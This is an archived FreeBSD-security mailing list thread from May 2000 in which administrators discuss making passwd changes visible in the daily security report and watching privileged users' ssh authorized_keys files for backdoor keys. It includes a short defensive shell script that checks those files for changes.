Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 8 May 2000, Narvi wrote:

> Another thing to consider (and I am yet to see it in this discussion):
>
> Say a block relatively in the beginning of the dump gets read off
> the tape corrupted. Any encryption scheme in which such means that
> the entire dump is worthless is less than satisfactory in most
> environments.

Correct me if I'm wrong, but an error in a cipher block will break just
the corrupted block in CFB mode, and this and the next blocks in OFB and
CBC modes. The rest of the dump will be OK and, because a dump block is
usually much bigger than a cipher block, the error will not spread at
all, even if the entire dump is encrypted with a single key and IV.

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GIT d- s+:- a-- C++ UB++$ P+ L+ E- W+ N++ o? K? w-- O- M- V? PS+ PE+ Y+
PGP+ t 5+ X R tv b++(+++) DI? D++ G e++ h r- y
------END GEEK CODE BLOCK------

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed May 10 5: 1: 8 2000
Delivered-To: freebsd-security@freebsd.org
Received: from vuurwerk.nl (envy.vuurwerk.nl [194.178.232.112]) by hub.freebsd.org (Postfix) with SMTP id F24B437B613 for ; Wed, 10 May 2000 05:00:57 -0700 (PDT) (envelope-from petervd@vuurwerk.nl)
Received: (qmail 15070 invoked from network); 10 May 2000 12:00:53 -0000
Received: from kesteren.vuurwerk.nl (HELO vuurwerk.nl) (194.178.232.59) by envy.vuurwerk.nl with SMTP; 10 May 2000 12:00:53 -0000
Received: (qmail 46331 invoked by uid 11109); 10 May 2000 12:00:53 -0000
Mail-Followup-To: security@FreeBSD.ORG
Date: Wed, 10 May 2000 14:00:53 +0200
From: Peter van Dijk
To: security@FreeBSD.ORG
Subject: Re: envy.vuurwerk.nl daily run output
Message-ID: <20000510140053.G46065@vuurwerk.nl>
References: <20000509150609.L42267@vuurwerk.nl> <20000509215515.B29766@cc942873-a.ewndsr1.nj.home.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
In-Reply-To: <20000509215515.B29766@cc942873-a.ewndsr1.nj.home.com>; from cjc@cc942873-a.ewndsr1.nj.home.com on Tue, May 09, 2000 at 09:55:16PM -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, May 09, 2000 at 09:55:16PM -0400, Crist J. Clark wrote:
> On Tue, May 09, 2000 at 03:06:09PM +0200, Peter van Dijk wrote:
> > [snip]
> >
> > Backup passwd and group files:
> > envy.vuurwerk.nl passwd diffs:
> > 3c3
> > < root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash
> > ---
> > > root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash
> > [snip]
> >
> > This line needed some thinking from me until I realized that it was trying
> > to tell me the root password changed (which I already knew, of course). Could
> > this be made more obvious, something like (password1) in the top one and
> > (password2) in the bottom one?
>
> Can you think of a clean way to do it? You do not want to show
> 'password1' and 'password2' if the password _didn't_ change, right?

Correct.

> Now, for the case above, it is easy enough, but you need to handle
> the possibility of multiple changes.
>
> Sure, it's quite possible to do with awk(1) or perl(1), but IMHO, I'll
> take the simple solution in 200.backup-passwd over something that
> would need to be fairly complicated. Personally, I don't think most
> people stare too long at the above line before figuring it out, and
> once they do, they never have trouble spotting it again.
>
> Then again... If someone sees a quick way to do it...

I think you are right. I will recognize what it means next time, and a
simple shell-scripting solution doesn't seem to be anywhere near.

Thank you for your time :)

Greetz, Peter.
--
Powered by WUT? - Peter van Dijk [student:sysadmin:developer:madly in love]
| `Yes, this was actually a hack and not | (petervd@|www.)vuurwerk.nl
| a scritp kiddie clicking a mouse button.' | www.dataloss.net
| - hackernews.com, commenting on the apache.org deface

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed May 10 5:53: 7 2000
Delivered-To: freebsd-security@freebsd.org
Received: from infidel.boolean.net (router.boolean.net [198.144.206.49]) by hub.freebsd.org (Postfix) with ESMTP id 62F1837B711 for ; Wed, 10 May 2000 05:52:56 -0700 (PDT) (envelope-from Kurt@OpenLDAP.org)
Received: from gypsy (gypsy.boolean.net [198.144.202.243]) by infidel.boolean.net (8.9.3/8.9.3) with SMTP id MAA58078; Wed, 10 May 2000 12:52:47 GMT (envelope-from Kurt@OpenLDAP.org)
Message-Id: <3.0.5.32.20000510055246.009b9100@infidel.boolean.net>
X-Sender: guru@infidel.boolean.net
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32)
Date: Wed, 10 May 2000 05:52:46 -0700
To: Peter van Dijk
From: "Kurt D. Zeilenga"
Subject: Re: envy.vuurwerk.nl daily run output
Cc: security@FreeBSD.ORG
In-Reply-To: <20000510140053.G46065@vuurwerk.nl>
References: <20000509215515.B29766@cc942873-a.ewndsr1.nj.home.com> <20000509150609.L42267@vuurwerk.nl> <20000509215515.B29766@cc942873-a.ewndsr1.nj.home.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 02:00 PM 5/10/00 +0200, Peter van Dijk wrote:
>On Tue, May 09, 2000 at 09:55:16PM -0400, Crist J. Clark wrote:
>> On Tue, May 09, 2000 at 03:06:09PM +0200, Peter van Dijk wrote:
>> > [snip]
>> >
>> > Backup passwd and group files:
>> > envy.vuurwerk.nl passwd diffs:
>> > 3c3
>> > < root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash
>> > ---
>> > > root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash
>> > [snip]

Actually, the use of "password" could mask a change... consider

< root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash
---
> root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/tcsh

The admin would likely assume only the shell has changed even
though password may have changed.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed May 10 5:55:23 2000
Delivered-To: freebsd-security@freebsd.org
Received: from vuurwerk.nl (envy.vuurwerk.nl [194.178.232.112]) by hub.freebsd.org (Postfix) with SMTP id 8C7A437B5C5 for ; Wed, 10 May 2000 05:55:15 -0700 (PDT) (envelope-from petervd@vuurwerk.nl)
Received: (qmail 15365 invoked from network); 10 May 2000 12:55:08 -0000
Received: from kesteren.vuurwerk.nl (HELO vuurwerk.nl) (194.178.232.59) by envy.vuurwerk.nl with SMTP; 10 May 2000 12:55:08 -0000
Received: (qmail 47366 invoked by uid 11109); 10 May 2000 12:55:08 -0000
Mail-Followup-To: security@FreeBSD.ORG
Date: Wed, 10 May 2000 14:55:08 +0200
From: Peter van Dijk
To: security@FreeBSD.ORG
Subject: Re: envy.vuurwerk.nl daily run output
Message-ID: <20000510145508.M46065@vuurwerk.nl>
References: <20000509215515.B29766@cc942873-a.ewndsr1.nj.home.com> <20000509150609.L42267@vuurwerk.nl> <20000509215515.B29766@cc942873-a.ewndsr1.nj.home.com> <20000510140053.G46065@vuurwerk.nl> <3.0.5.32.20000510055246.009b9100@infidel.boolean.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
In-Reply-To: <3.0.5.32.20000510055246.009b9100@infidel.boolean.net>; from Kurt@OpenLDAP.org on Wed, May 10, 2000 at 05:52:46AM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, May 10, 2000 at 05:52:46AM -0700, Kurt D. Zeilenga wrote:
> At 02:00 PM 5/10/00 +0200, Peter van Dijk wrote:
> >On Tue, May 09, 2000 at 09:55:16PM -0400, Crist J. Clark wrote:
> >> On Tue, May 09, 2000 at 03:06:09PM +0200, Peter van Dijk wrote:
> >> > [snip]
> >> >
> >> > Backup passwd and group files:
> >> > envy.vuurwerk.nl passwd diffs:
> >> > 3c3
> >> > < root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash
> >> > ---
> >> > > root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash
> >> > [snip]
>
> Actually, the use of "password" could mask a change... consider
>
> < root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash
> ---
> > root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/tcsh
>
> The admin would likely assume only the shell has changed even
> though password may have changed.

Now _there_ is a good point. We need password1/password2 for security.
Damn.

Greetz, Peter.
--
Powered by WUT? - Peter van Dijk [student:sysadmin:developer:madly in love]
| `Yes, this was actually a hack and not | (petervd@|www.)vuurwerk.nl
| a scritp kiddie clicking a mouse button.' | www.dataloss.net
| - hackernews.com, commenting on the apache.org deface

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed May 10 6:32:41 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mercure.univ-ubs.fr (mercure.univ-ubs.fr [194.199.58.4]) by hub.freebsd.org (Postfix) with ESMTP id 2B05437B7AC for ; Wed, 10 May 2000 06:32:34 -0700 (PDT) (envelope-from beurton@moorea.univ-ubs.fr)
Received: from moorea.univ-ubs.fr (beurton@moorea.univ-ubs.fr [193.52.49.20]) by mercure.univ-ubs.fr (8.9.1a/jtpda-5.3.1) with ESMTP id PAA19860 for ; Wed, 10 May 2000 15:32:12 +0200
Received: (from beurton@localhost) by moorea.univ-ubs.fr (8.9.3/8.9.3/$RCSfile: nisdebian-client.mc,v $Revision: 1.2 $) id PAA24088 for security@FreeBSD.ORG; Wed, 10 May 2000 15:32:00 +0200
Date: Wed, 10 May 2000 15:32:00 +0200
From: "Luc.Beurton"
To: security@FreeBSD.ORG
Subject: Re: envy.vuurwerk.nl daily run output
Message-ID: <20000510153159.A23888@moorea.univ-ubs.fr>
References: <20000509215515.B29766@cc942873-a.ewndsr1.nj.home.com> <20000509150609.L42267@vuurwerk.nl> <20000509215515.B29766@cc942873-a.ewndsr1.nj.home.com> <20000510140053.G46065@vuurwerk.nl> <3.0.5.32.20000510055246.009b9100@infidel.boolean.net> <20000510145508.M46065@vuurwerk.nl>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.3i
In-Reply-To: <20000510145508.M46065@vuurwerk.nl>; from Peter van Dijk on Wed, May 10, 2000 at 02:55:08PM +0200
X-Whois: LB895-ARIN
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > Actually, the use of "password" could mask a change... consider
> >
> > < root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash
> > ---
> > > root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/tcsh
> >
> > The admin would likely assume only the shell has changed even
> > though password may have changed.
>
> Now _there_ is a good point. We need password1/password2 for security.
> Damn.

Maybe the solution could be to crypt the crypted password like this?

    # \047 is a single quote, so the shell does not expand the "$" in a hash
    awk 'BEGIN{FS=":";OFS=":"}($2){CMD="echo \047"$2"\047| /sbin/md5";CMD|getline $2;close(CMD)}{print}'

Or add flag -d -f to md5, something like:

    diff /var/backup/master.passwd.bak /etc/master.passwd | md5 -d: -f2

I don't know if md5 is secure enough with a small string.

Luc Beurton.
From owner-freebsd-security Wed May 10 11:56:46 2000
Delivered-To: freebsd-security@freebsd.org
Received: from silby.com (adam042-051.resnet.wisc.edu [146.151.42.51])
    by hub.freebsd.org (Postfix) with SMTP id C016237B8FE for ;
    Wed, 10 May 2000 11:56:39 -0700 (PDT) (envelope-from silby@silby.com)
Received: (qmail 26888 invoked by uid 1000); 10 May 2000 18:56:29 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP;
    10 May 2000 18:56:29 -0000
Date: Wed, 10 May 2000 13:56:29 -0500 (CDT)
From: Mike Silbersack
To: Peter van Dijk
Cc: security@freebsd.org
Subject: Re: envy.vuurwerk.nl daily run output
In-Reply-To: <20000509150609.L42267@vuurwerk.nl>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, 9 May 2000, Peter van Dijk wrote:

> [snip]
>
> Backup passwd and group files:
> envy.vuurwerk.nl passwd diffs:
> 3c3
> < root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash
> ---
> > root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash
> [snip]
>
> This line needed some thinking from me until I realized that it was trying
> to tell me the root password changed (which I already knew, of course). Could
> this be made more obvious, something like (password1) in the top one and
> (password2) in the bottom one?

This just got me thinking... are .ssh/authorized_keys files checked for
changes by the security scripts? I know I probably wouldn't notice for a
long while if someone had modified mine, all the time during which someone
could be playing around on the box.
Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 10 12:21:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id 16D1F37B8EA for ; Wed, 10 May 2000 12:21:33 -0700 (PDT) (envelope-from cdf.lists@fxp.org) Received: by pawn.primelocation.net (Postfix, from userid 1016) id 7D3BF9B1D; Wed, 10 May 2000 15:21:30 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by pawn.primelocation.net (Postfix) with ESMTP id 70E5EBA0F; Wed, 10 May 2000 15:21:30 -0400 (EDT) Date: Wed, 10 May 2000 15:21:30 -0400 (EDT) From: "Chris D. Faulhaber" X-Sender: cdf.lists@pawn.primelocation.net To: Mike Silbersack Cc: Peter van Dijk , security@freebsd.org Subject: Re: envy.vuurwerk.nl daily run output In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 10 May 2000, Mike Silbersack wrote: > > On Tue, 9 May 2000, Peter van Dijk wrote: > > > [snip] > > > > Backup passwd and group files: > > envy.vuurwerk.nl passwd diffs: > > 3c3 > > < root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash > > --- > > > root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash > > [snip] > > > > This line needed some thinking from me until I realized that it was trying > > to tell me the rootpassword changed (which I already knew, ofcourse). Could > > this be made more obvious, something like (password1) in the top one and > > (password2) in the bottom one? > > This just got me thinking... are .ssh/authorized_keys files checked for > changes by the security scripts? I know I probably wouldn't notice for a > long while if someone had modified mine, all the time during which someone > could be playing around on the box. 
> I don't think it is the system's responsibility to check user's files; however, it might be a decent idea to have the system check to see anything in /etc/ssh/ has changed. See http://www.fxp.org/~jedgar/230.backup-ssh for the script I use. ----- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 10 14:42:58 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (adam042-051.resnet.wisc.edu [146.151.42.51]) by hub.freebsd.org (Postfix) with SMTP id C0B0A37B837 for ; Wed, 10 May 2000 14:42:56 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 28580 invoked by uid 1000); 10 May 2000 21:42:54 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 10 May 2000 21:42:54 -0000 Date: Wed, 10 May 2000 16:42:54 -0500 (CDT) From: Mike Silbersack To: "Chris D. Faulhaber" Cc: Peter van Dijk , security@freebsd.org Subject: Re: envy.vuurwerk.nl daily run output In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 10 May 2000, Chris D. Faulhaber wrote: > On Wed, 10 May 2000, Mike Silbersack wrote: > > > This just got me thinking... are .ssh/authorized_keys files checked for > > changes by the security scripts? I know I probably wouldn't notice for a > > long while if someone had modified mine, all the time during which someone > > could be playing around on the box. > > > > I don't think it is the system's responsibility to check user's files; > however, it might be a decent idea to have the system check to see > anything in /etc/ssh/ has changed. See > http://www.fxp.org/~jedgar/230.backup-ssh for the script I use. 
See, I'm not sure that authorized_keys are user files, as they perform the
same function that system passwords do. And since ssh is now part of the
base system, they should be considered equal in importance to the password
file.

I understand that diffing every user's authorized_keys would be a huge
pain, perhaps only root/toor need to be checked.

In the long term, perhaps having a central database of all the public keys
on the system instead of authorized_keys is the correct answer. In the
meantime, I think some thought should be put to the issue of watching
root's authorized_keys - if someone can find a way to cause some root
running daemon (say, mysql) to create an arbitrary authorized_keys, you'd
never see it happen in the security logs.

Mike "Silby" Silbersack

From owner-freebsd-security Wed May 10 14:55: 0 2000
Delivered-To: freebsd-security@freebsd.org
Received: from vuurwerk.nl (envy.vuurwerk.nl [194.178.232.112])
    by hub.freebsd.org (Postfix) with SMTP id 210C337B996 for ;
    Wed, 10 May 2000 14:54:53 -0700 (PDT) (envelope-from petervd@vuurwerk.nl)
Received: (qmail 19647 invoked from network); 10 May 2000 21:54:49 -0000
Received: from kesteren.vuurwerk.nl (HELO vuurwerk.nl) (194.178.232.59)
    by envy.vuurwerk.nl with SMTP; 10 May 2000 21:54:49 -0000
Received: (qmail 55365 invoked by uid 11109); 10 May 2000 21:54:49 -0000
Mail-Followup-To: security@freebsd.org
Date: Wed, 10 May 2000 23:54:49 +0200
From: Peter van Dijk
To: security@freebsd.org
Subject: Re: envy.vuurwerk.nl daily run output
Message-ID: <20000510235449.D50484@vuurwerk.nl>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
In-Reply-To: ; from silby@silby.com on Wed, May 10, 2000 at 04:42:54PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, May 10, 2000 at 04:42:54PM -0500, Mike Silbersack wrote:
[snip] > > In the long term, perhaps having a central database of all the public keys > on the system instead of authorized_keys is the correct answer. In the > meantime, I think some thought should be put to the issue of watching > root's authorized_keys - if someone kind find a way to cause some root > running daemon (say, mysql) to create an arbitrary authorized_keys, you'd > never see it happen in the security logs. Have a look at http://www.dataloss.net/papers/how.defaced.apache.org.txt to see how real the threat of a root-mysql is ;) Greetz, Peter. -- Powered by WUT? - Peter van Dijk [student:sysadmin:developer:madly in love] | `Yes, this was actually a hack and not | (petervd@|www.)vuurwerk.nl | a scritp kiddie clicking a mouse button.' | www.dataloss.net | - hackernews.com, commenting on the apache.org deface To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 10 15:17:54 2000 Delivered-To: freebsd-security@freebsd.org Received: from postal.linkfast.net (postal.linkfast.net [208.160.105.2]) by hub.freebsd.org (Postfix) with ESMTP id B189D37B6DA for ; Wed, 10 May 2000 15:17:48 -0700 (PDT) (envelope-from fullermd@linkfast.net) Received: by postal.linkfast.net (Postfix, from userid 100) id 436929B1A; Wed, 10 May 2000 17:17:46 -0500 (CDT) Date: Wed, 10 May 2000 17:17:46 -0500 From: Matthew Fuller To: Mike Silbersack Cc: "Chris D. 
Faulhaber" , Peter van Dijk , security@freebsd.org Subject: Re: envy.vuurwerk.nl daily run output Message-ID: <20000510171745.E61969@linkfast.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from silby@silby.com on Wed, May 10, 2000 at 04:42:54PM -0500 X-OS: FreeBSD Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, May 10, 2000 at 04:42:54PM -0500, a little birdie told me that Mike Silbersack remarked > > See, I'm not sure that authorized_keys are user files, as they perform the > same function that system passwords do. And since ssh is now part of the > base system, they should be considered equal in importance to the password > file. Well, consider that authorized_keys files perform the same function as .rhosts. Would you propose doing the same for them? -- Matthew Fuller (MF4839) | fullermd@over-yonder.net Unix Systems Administrator | fullermd@linkfast.net Specializing in FreeBSD | http://www.over-yonder.net/ "The only reason I'm burning my candle at both ends, is because I haven't figured out how to light the middle yet" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 10 16:24:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (adam042-051.resnet.wisc.edu [146.151.42.51]) by hub.freebsd.org (Postfix) with SMTP id 32C1837BA52 for ; Wed, 10 May 2000 16:24:37 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 28817 invoked by uid 1000); 10 May 2000 23:24:35 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 10 May 2000 23:24:35 -0000 Date: Wed, 10 May 2000 18:24:35 -0500 (CDT) From: Mike Silbersack To: security@freebsd.org Subject: Re: envy.vuurwerk.nl daily run output In-Reply-To: <20000510171745.E61969@linkfast.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: 
owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 10 May 2000, Matthew Fuller wrote: > On Wed, May 10, 2000 at 04:42:54PM -0500, a little birdie told me > that Mike Silbersack remarked > > > > See, I'm not sure that authorized_keys are user files, as they perform the > > same function that system passwords do. And since ssh is now part of the > > base system, they should be considered equal in importance to the password > > file. > > Well, consider that authorized_keys files perform the same function as > .rhosts. Would you propose doing the same for them? I don't use telnet/rshd/etc, so I don't care about them. But in a paranoid system, I suppose they would be tracked. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 10 22:58:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from jason.argos.org (a1-3b058.neo.rr.com [24.93.181.58]) by hub.freebsd.org (Postfix) with ESMTP id DB55F37B788 for ; Wed, 10 May 2000 22:58:10 -0700 (PDT) (envelope-from mike@argos.org) Received: from localhost (mike@localhost) by jason.argos.org (8.9.1/8.9.1) with ESMTP id BAA00212; Thu, 11 May 2000 01:57:08 -0400 Date: Thu, 11 May 2000 01:57:08 -0400 (EDT) From: Mike Nowlin To: Mike Silbersack Cc: "Chris D. Faulhaber" , Peter van Dijk , security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I understand that diffing every user's authorized_keys would be a huge > pain, perhaps only root/toor need to be checked. Or everyone in group 0 -- the people in that group should understand the relevance of changes in these files, and why ask for problems? (Not saying this is a good idea, (although it might be), but if you're gonna do it, do it right.) 
mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 10 23:24: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from axl.ops.uunet.co.za (axl.ops.uunet.co.za [196.31.2.163]) by hub.freebsd.org (Postfix) with ESMTP id 033F237B7E4 for ; Wed, 10 May 2000 23:23:53 -0700 (PDT) (envelope-from sheldonh@axl.ops.uunet.co.za) Received: from sheldonh (helo=axl.ops.uunet.co.za) by axl.ops.uunet.co.za with local-esmtp (Exim 3.13 #1) id 12pmLz-0009wd-00; Thu, 11 May 2000 08:21:47 +0200 From: Sheldon Hearn To: Mike Nowlin Cc: Mike Silbersack , "Chris D. Faulhaber" , Peter van Dijk , security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output In-reply-to: Your message of "Thu, 11 May 2000 01:57:08 -0400." Date: Thu, 11 May 2000 08:21:47 +0200 Message-ID: <38229.958026107@axl.ops.uunet.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 11 May 2000 01:57:08 -0400, Mike Nowlin wrote: > > I understand that diffing every user's authorized_keys would be a huge > > pain, perhaps only root/toor need to be checked. > > Or everyone in group 0 -- the people in that group should understand the > relevance of changes in these files, and why ask for problems? I don't think these ideas are useful for the generalized daily run. They should remain local hacks (ideally with well-circulated patches) until someone's done the work to make the daily security run configurable, and even that needs patch circulation before further discussion. Ciao, Sheldon. 
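A local check of the kind this thread discusses, as an added example (it is not the 230.backup-ssh script linked earlier and not part of /etc/security): it keeps a reference copy of authorized_keys for every uid 0 account and every account in gid 0, and reports added or removed keys on the next run. The function names, the state directory layout and the optional path prefix (used only to point the check at a constructed test tree) are assumptions of this example.

```shell
#!/bin/sh
# Added example: watch authorized_keys of privileged accounts for changes.
# "Privileged" = uid 0 (root, toor), primary gid 0, or member of the gid 0 group.

# privileged_homes PASSWD GROUP  ->  "user:home" lines, one per distinct home
privileged_homes() {
    awk -F: '
        /^#/ { next }
        pass == 1 {                         # group file: collect gid 0 members
            if ($3 == 0) {
                n = split($4, m, ",")
                for (i = 1; i <= n; i++) member[m[i]] = 1
            }
            next
        }
        # passwd file: name:pw:uid:gid:gecos:home:shell
        ($3 == 0 || $4 == 0 || ($1 in member)) && !seen[$6]++ { print $1 ":" $6 }
    ' pass=1 "$2" pass=2 "$1"
}

# check_authorized_keys PASSWD GROUP STATEDIR [PREFIX]
check_authorized_keys() {
    ck_passwd=$1 ck_group=$2 ck_state=$3 ck_prefix=${4:-}
    mkdir -p "$ck_state" && chmod 700 "$ck_state" || return 1
    privileged_homes "$ck_passwd" "$ck_group" |
    while IFS=: read -r user home; do
        cur="$ck_prefix$home/.ssh/authorized_keys"
        ref="$ck_state/$user.authorized_keys"
        [ -f "$cur" ] || cur=/dev/null      # a missing file counts as "no keys"
        [ -f "$ref" ] || : > "$ref"         # first run: start from an empty baseline
        if ! cmp -s "$ref" "$cur"; then
            echo "$user: $home/.ssh/authorized_keys changed"
            # "<" = key present at the last run and now gone, ">" = key added
            diff "$ref" "$cur" | sed -n '/^[<>]/p'
            cat "$cur" > "$ref"
        fi
    done
}

# Example invocation (state directory name is an assumption):
#   sh check_keys.sh /etc/passwd /etc/group /var/backups/ssh-keys
if [ "$#" -ge 3 ]; then
    check_authorized_keys "$@"
fi
```

The reference copies live on the same machine, so the caveat raised later in the thread about falsified reference data applies to this check as well.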
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 3:25: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id D95B437B90D for ; Thu, 11 May 2000 03:24:52 -0700 (PDT) (envelope-from adam@algroup.co.uk) Received: from algroup.co.uk ([192.168.192.2]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id KAA09707; Thu, 11 May 2000 10:23:59 GMT Message-ID: <391A8A3C.795C15F7@algroup.co.uk> Date: Thu, 11 May 2000 11:23:56 +0100 From: Adam Laurie X-Mailer: Mozilla 4.7 [en-gb] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Mike Silbersack Cc: "Chris D. Faulhaber" , Peter van Dijk , security@freebsd.org Subject: Re: envy.vuurwerk.nl daily run output References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Mike Silbersack wrote: > > On Wed, 10 May 2000, Chris D. Faulhaber wrote: > > > On Wed, 10 May 2000, Mike Silbersack wrote: > > > > > This just got me thinking... are .ssh/authorized_keys files checked for > > > changes by the security scripts? I know I probably wouldn't notice for a > > > long while if someone had modified mine, all the time during which someone > > > could be playing around on the box. > > > > > > > I don't think it is the system's responsibility to check user's files; > > however, it might be a decent idea to have the system check to see > > anything in /etc/ssh/ has changed. See > > http://www.fxp.org/~jedgar/230.backup-ssh for the script I use. > > See, I'm not sure that authorized_keys are user files, as they perform the > same function that system passwords do. And since ssh is now part of the > base system, they should be considered equal in importance to the password > file. 
Absolutely. If someone backdoors your system with an authorized key, and is confident they can gain root from a luser account, they don't need to go any further, and it's extremely likely that the change will go unnoticed *forever* (when was the last time you checked your own authorized_keys file?)... As it happens, I'm working on a patch for /etc/security at the moment - I'll post it for review... cheers, Adam -- Adam Laurie Tel: +44 (181) 742 0755 A.L. Digital Ltd. Fax: +44 (181) 742 5995 Voysey House Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 9: 4:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.veriohosting.com (gatekeeper.veriohosting.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id 4521537BB10 for ; Thu, 11 May 2000 09:03:49 -0700 (PDT) (envelope-from hart@iserver.com) Received: by gatekeeper.veriohosting.com; Thu, 11 May 2000 10:03:48 -0600 (MDT) Received: from unknown(192.168.1.109) by gatekeeper.veriohosting.com via smap (V3.1.1) id xma014294; Thu, 11 May 00 10:03:38 -0600 Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.3) id KAA08418; Thu, 11 May 2000 10:03:38 -0600 (MDT) Date: Thu, 11 May 2000 10:03:38 -0600 (MDT) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com To: Adam Laurie Cc: freebsd-security@freebsd.org Subject: Re: envy.vuurwerk.nl daily run output 